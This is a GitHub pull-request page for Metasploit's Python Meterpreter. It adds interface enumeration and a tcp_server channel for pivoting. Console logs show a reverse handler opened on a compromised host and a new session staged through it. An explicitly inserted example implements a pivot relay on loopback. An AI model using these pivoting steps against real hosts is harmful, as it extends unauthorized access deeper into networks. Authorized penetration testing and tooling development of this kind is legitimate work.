Python Meterpreter STDAPI Net Additions #3067

Merged: 10 commits merged into rapid7:master from zeroSteiner:pymeterpreter-net on Mar 13, 2014

Contributor

zeroSteiner commented Mar 5, 2014

This PR adds functionality to the python meterpreter for retrieving network interface information on Linux, Windows, and OSX. The bulk of this for Linux and Windows was ported from the corresponding native meterpreter implementations (Netlink and GetAdaptersAddresses). This also adds support for opening a tcp_server channel, which increases the python meterpreter's pivoting capabilities.

This has been tested on the following platforms:

  • Python 2.6 Linux 3.2.6
  • Python 2.7 Linux 3.13.4
  • Python 2.5 & 2.7 Windows XP SP3
  • Python 2.7 Windows 7 SP1 (Native 32-bit and Native 64-bit)
  • Python 2.7 OS X 10.7.5

To avoid adding another 100+ lines, the output of ipconfig from each system is on pastebin.

Verification stdapi_net_config_get_interfaces

The post/test/meterpreter module will check that IP addresses are returned from sessions in the interface information. Alternatively, checking the output of 'ipconfig' on each of the 3 major platforms should yield the expected output:

meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP LOOPBACK RUNNING
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:4b:5c:be
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST
IPv4 Address : 192.168.90.168
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe4b:5cbe
IPv6 Netmask : ffff:ffff:ffff:ffff::

Verification net_tcp_server channel

To create a new tcp_server channel, set up routes and then configure LHOST to an IP address available on the host being routed through. Running the handler should cause the message "Started reverse handler on ... via meterpreter session X" to be displayed. While the handler is running, netstat on the compromised host should indicate that the socket is open and listening.

msf4-git (S:2 J:0)  exploit(handler) > sessions -i -1
[*] Starting interaction with 9...

meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP LOOPBACK RUNNING
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:4b:5c:be
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST
IPv4 Address : 192.168.90.168
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe4b:5cbe
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > background 
[*] Backgrounding session 9...
msf4-git (S:2 J:0)  exploit(handler) > route add 0.0.0.0 0.0.0.0 -1
[*] Route added
msf4-git (S:2 J:0)  exploit(handler) > set LHOST 192.168.90.168
LHOST => 192.168.90.168
msf4-git (S:2 J:0)  exploit(handler) > exploit

[*] Started reverse handler on 192.168.90.168:4444 via the meterpreter on session 9
[*] Starting the payload handler...
[*] Sending stage (17308 bytes)
[*] Meterpreter session 10 opened (Local Pipe -> Remote Pipe) at 2014-03-05 15:57:54 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux 3.13.4-200.fc20.x86_64 #1 SMP Thu Feb 20 23:00:47 UTC 2014
Architecture : x86_64
Meterpreter  : python/python
meterpreter > background 
[*] Backgrounding session 10...
msf4-git (S:3 J:0)  exploit(handler) > sessions

Active sessions
===============

  Id  Type                       Information                      Connection
  --  ----                       -----------                      ----------
  8   meterpreter python/python  tester @ WIN-82GTIDG995P         192.168.90.1:4444 -> 192.168.90.137:49190 (192.168.90.137)
  9   meterpreter python/python  root @ bt                        192.168.90.1:4444 -> 192.168.90.168:36758 (192.168.90.168)
  10  meterpreter python/python  steiner @ localhost.localdomain  Local Pipe -> Remote Pipe (172.20.220.118)

msf4-git (S:3 J:0)  exploit(handler) > 

Obligatory yo dawg I heard you like meterpreter sessions.

Verification Checklist:

  • run post/test/meterpreter on Windows
  • run post/test/meterpreter on Linux
  • run post/test/meterpreter on OSX
  • run reverse_tcp handler with a remote LHOST on Windows
  • run reverse_tcp handler with a remote LHOST on Linux
  • run reverse_tcp handler with a remote LHOST on OSX
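The PR description says the Linux side of stdapi_net_config_get_interfaces was ported from the native meterpreter's Netlink code. The block below is an added example written for this page, not code from the PR or from Metasploit: it sends an RTM_GETADDR dump request over NETLINK_ROUTE and parses the RTM_NEWADDR replies into the address, netmask and label fields that ipconfig prints. Constants and struct layouts follow <linux/netlink.h> and <linux/rtnetlink.h>; the helper names (build_getaddr_request, parse_addr_messages, and so on) and the builder used to construct sample replies are this example's own. The live query only works on Linux; the parser runs anywhere, and the Windows GetAdaptersAddresses path is not covered here.

```python
# Added example (not the PR's or Metasploit's code): a minimal RTM_GETADDR
# client for NETLINK_ROUTE, the Linux mechanism the PR description names.
# Constants and struct layouts follow <linux/netlink.h> and <linux/rtnetlink.h>.
import os
import socket
import struct

NETLINK_ROUTE = 0
NLM_F_REQUEST, NLM_F_MULTI, NLM_F_DUMP = 0x01, 0x02, 0x300   # NLM_F_DUMP = NLM_F_ROOT | NLM_F_MATCH
NLMSG_ERROR, NLMSG_DONE = 2, 3
RTM_NEWADDR, RTM_GETADDR = 20, 22
IFA_ADDRESS, IFA_LOCAL, IFA_LABEL = 1, 2, 3
AF_INET, AF_INET6 = socket.AF_INET, socket.AF_INET6                  # re-exported for callers
NLMSGHDR = struct.Struct('=IHHII')   # nlmsg_len, nlmsg_type, nlmsg_flags, nlmsg_seq, nlmsg_pid
IFADDRMSG = struct.Struct('=BBBBI')  # ifa_family, ifa_prefixlen, ifa_flags, ifa_scope, ifa_index
RTATTR = struct.Struct('=HH')        # rta_len, rta_type; payload follows, padded to 4 bytes

def _align4(n):
    return (n + 3) & ~3

def build_getaddr_request(seq=1, family=socket.AF_UNSPEC):
    """Dump request: the kernel answers with one RTM_NEWADDR per configured address."""
    hdr = NLMSGHDR.pack(NLMSGHDR.size + IFADDRMSG.size, RTM_GETADDR, NLM_F_REQUEST | NLM_F_DUMP, seq, 0)
    return hdr + IFADDRMSG.pack(family, 0, 0, 0, 0)

def build_newaddr_message(family, prefixlen, index, addr, label=None, seq=1):
    """Encode one RTM_NEWADDR record the way the kernel does; used here to construct test input."""
    attrs = [(IFA_ADDRESS, socket.inet_pton(family, addr))]
    if label is not None:                       # the kernel attaches IFA_LABEL to IPv4 addresses only
        attrs.append((IFA_LABEL, label.encode() + b'\0'))
    body = IFADDRMSG.pack(family, prefixlen, 0, 0, index)
    for rta_type, value in attrs:
        rta = RTATTR.pack(RTATTR.size + len(value), rta_type) + value
        body += rta.ljust(_align4(len(rta)), b'\0')
    return NLMSGHDR.pack(NLMSGHDR.size + len(body), RTM_NEWADDR, NLM_F_MULTI, seq, 0) + body

def build_done_message(seq=1):
    return NLMSGHDR.pack(NLMSGHDR.size + 4, NLMSG_DONE, NLM_F_MULTI, seq, 0) + struct.pack('=i', 0)

def prefix_to_netmask(family, prefixlen):
    bits = 32 if family == socket.AF_INET else 128
    mask = ((1 << prefixlen) - 1) << (bits - prefixlen)
    return socket.inet_ntop(family, mask.to_bytes(bits // 8, 'big'))

def parse_rtattrs(buf):
    attrs, off = {}, 0
    while off + RTATTR.size <= len(buf):
        rta_len, rta_type = RTATTR.unpack_from(buf, off)
        if rta_len < RTATTR.size or off + rta_len > len(buf):
            break                               # malformed attribute: stop rather than spin or overread
        attrs[rta_type] = buf[off + RTATTR.size:off + rta_len]
        off += _align4(rta_len)
    return attrs

def parse_addr_messages(data):
    """Walk one recv() buffer; returns (entries, done). Raises OSError on a non-zero NLMSG_ERROR."""
    entries, done, off = [], False, 0
    while off + NLMSGHDR.size <= len(data):
        nl_len, nl_type, _flags, _seq, _pid = NLMSGHDR.unpack_from(data, off)
        if nl_len < NLMSGHDR.size or off + nl_len > len(data):
            break                               # truncated message
        if nl_type == NLMSG_DONE:
            done = True
            break
        if nl_type == NLMSG_ERROR:
            err = -struct.unpack_from('=i', data, off + NLMSGHDR.size)[0]
            if err:
                raise OSError(err, os.strerror(err))
        elif nl_type == RTM_NEWADDR:
            family, prefixlen, _f, _scope, index = IFADDRMSG.unpack_from(data, off + NLMSGHDR.size)
            attrs = parse_rtattrs(data[off + NLMSGHDR.size + IFADDRMSG.size:off + nl_len])
            raw = attrs.get(IFA_LOCAL) or attrs.get(IFA_ADDRESS)   # IFA_LOCAL is ours on point-to-point links
            if raw:
                label = attrs[IFA_LABEL].rstrip(b'\0').decode() if IFA_LABEL in attrs else None
                entries.append(dict(index=index, label=label, family=family,
                                    address=socket.inet_ntop(family, raw),
                                    netmask=prefix_to_netmask(family, prefixlen)))
        off += _align4(nl_len)
    return entries, done

def get_interface_addresses():
    """Live query; Linux only (AF_NETLINK) and needs no privileges for a dump."""
    sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, NETLINK_ROUTE)
    try:
        sock.bind((0, 0))
        sock.send(build_getaddr_request())
        results = []
        while True:
            entries, done = parse_addr_messages(sock.recv(65536))
            results.extend(entries)
            if done:
                return results
    finally:
        sock.close()

if __name__ == '__main__':
    for e in get_interface_addresses():
        name = e['label'] or socket.if_indextoname(e['index'])   # IPv6 records carry no IFA_LABEL
        print('%-6s %s/%s' % (name, e['address'], e['netmask']))
```

Two details matter when porting this into an agent: a dump can span several recv() calls, so the loop has to keep reading until NLMSG_DONE rather than assuming one buffer, and the rtattr walk has to reject a zero or oversized rta_len, otherwise a malformed reply spins the parser or reads past the buffer.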
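The net_tcp_server verification above shows the effect of the new channel type: the reverse handler's listening socket is opened on the compromised host (session 9), netstat there shows it in LISTEN, and the stage for session 10 travels over the existing session. The block below is an added example for this page, not the PR's or Metasploit's code, showing the shape of such a pivot on loopback: PivotTcpServer stands for the compromised host, the session link is a socketpair, and the frame format (kind, channel id, length) plus every name in it are this example's own, not Meterpreter's TLV protocol.

```python
# Added example (not the PR's or Metasploit's code): the shape of a tcp_server
# channel pivot. The listener lives on the compromised host; each accepted
# connection becomes a numbered channel relayed over the existing session link.
import socket, struct, threading

OPEN, DATA, CLOSE = 1, 2, 3
FRAME = struct.Struct('>BII')            # kind, channel id, payload length (this example's framing)

def recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('session link closed')
        buf += chunk
    return buf

def send_frame(sock, lock, kind, chan, payload=b''):
    with lock:                           # several channel threads share one link
        sock.sendall(FRAME.pack(kind, chan, len(payload)) + payload)

def recv_frame(sock):
    kind, chan, length = FRAME.unpack(recv_exact(sock, FRAME.size))
    return kind, chan, recv_exact(sock, length)

class PivotTcpServer:                    # compromised-host side: listener plus channel table
    def __init__(self, session, bind_addr=('127.0.0.1', 0)):
        self.session, self.lock, self.channels, self.next_id = session, threading.Lock(), {}, 1
        self.listener = socket.create_server(bind_addr)
        self.bound = self.listener.getsockname()   # the LISTEN entry netstat shows on the pivot

    def accept_loop(self):
        while True:
            try:
                conn, peer = self.listener.accept()
            except OSError:
                return                   # listener closed during shutdown
            with self.lock:
                chan, self.next_id = self.next_id, self.next_id + 1
                self.channels[chan] = conn
            send_frame(self.session, self.lock, OPEN, chan, ('%s:%d' % peer).encode())
            threading.Thread(target=self._pump, args=(conn, chan), daemon=True).start()

    def _pump(self, conn, chan):         # accepted socket -> session link
        try:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                send_frame(self.session, self.lock, DATA, chan, data)
            if self._drop(chan):         # peer closed first: tell the operator
                send_frame(self.session, self.lock, CLOSE, chan)
        except OSError:
            pass                         # channel torn down underneath us

    def _drop(self, chan):
        with self.lock:
            conn = self.channels.pop(chan, None)
        if conn is not None:
            try:
                conn.shutdown(socket.SHUT_RDWR)   # wakes a recv() blocked in _pump
            except OSError:
                pass
            conn.close()
        return conn is not None

    def operator_loop(self):             # session link -> accepted socket
        while True:
            try:
                kind, chan, payload = recv_frame(self.session)
            except OSError:              # session gone: close the listener too
                self.listener.close()
                return
            try:
                if kind == DATA:
                    self.channels[chan].sendall(payload)   # KeyError: stale channel id
                elif kind == CLOSE:
                    self._drop(chan)
            except (KeyError, OSError):
                self._drop(chan)         # only this channel dies; the listener survives

def demo():                              # both ends over loopback; returns what each side saw
    op_link, pivot_link = socket.socketpair()     # stands in for the meterpreter session
    op_link.settimeout(5)                         # fail loudly rather than hang
    pivot = PivotTcpServer(pivot_link)
    for loop in (pivot.accept_loop, pivot.operator_loop):
        threading.Thread(target=loop, daemon=True).start()
    target = socket.create_connection(pivot.bound, timeout=5)   # stands in for the reverse-connecting payload
    target.sendall(b'hello via pivot')
    opened = recv_frame(op_link)                  # (OPEN, chan, b'127.0.0.1:<port>')
    received = recv_frame(op_link)                # (DATA, chan, b'hello via pivot')
    send_frame(op_link, threading.Lock(), DATA, opened[1], b'ack')   # operator writes back
    reply = target.recv(64)
    target.close()
    closed = recv_frame(op_link)                  # (CLOSE, chan, b'')
    op_link.close()
    return opened, received, reply, closed
```

Three behaviours are the ones worth checking in a real implementation of this channel type: a write to a channel the operator has already closed must not take down the whole pivot, tearing down the session must also close the listening port it created, and a peer that hangs up must be reported to the operator as a CLOSE rather than silently dropped.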

zeroSteiner commented on the diff Mar 5, 2014

data/meterpreter/meterpreter.py
@@ -149,6 +180,25 @@ def tlv_pack(*args):
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
return data
+#@export
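Review bot: the added `+#@export` line is a commented-out decorator with nothing in the diff explaining why it is disabled, so a later reader of meterpreter.py cannot tell dead code from a deliberate Python 2.5 workaround (class decorators only became legal in 2.6, PEP 3129). Replace the commented line with a one-line comment stating that constraint, and if `export` is an ordinary function, register the class by calling it explicitly after the class body (`export(ClassName)`, name hypothetical) so the symbol is still exported on 2.5 instead of being silently skipped.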
zeroSteiner (Contributor) commented Mar 5, 2014:

Python 2.5 does not allow decorators around class definitions.

Contributor

jlee-r7 commented Mar 13, 2014

Only failing test is net_config_get_routes, which isn't implemented. I'll fix the test and merge in a bit

jlee-r7 pushed a commit that referenced this pull request Mar 13, 2014

egypt: Land #3067, python meterp net.config additions (6438b93)

jlee-r7 merged commit 5ea2668 into rapid7:master Mar 13, 2014

1 check passed: The Travis CI build passed

zeroSteiner deleted the zeroSteiner:pymeterpreter-net branch May 9, 2014
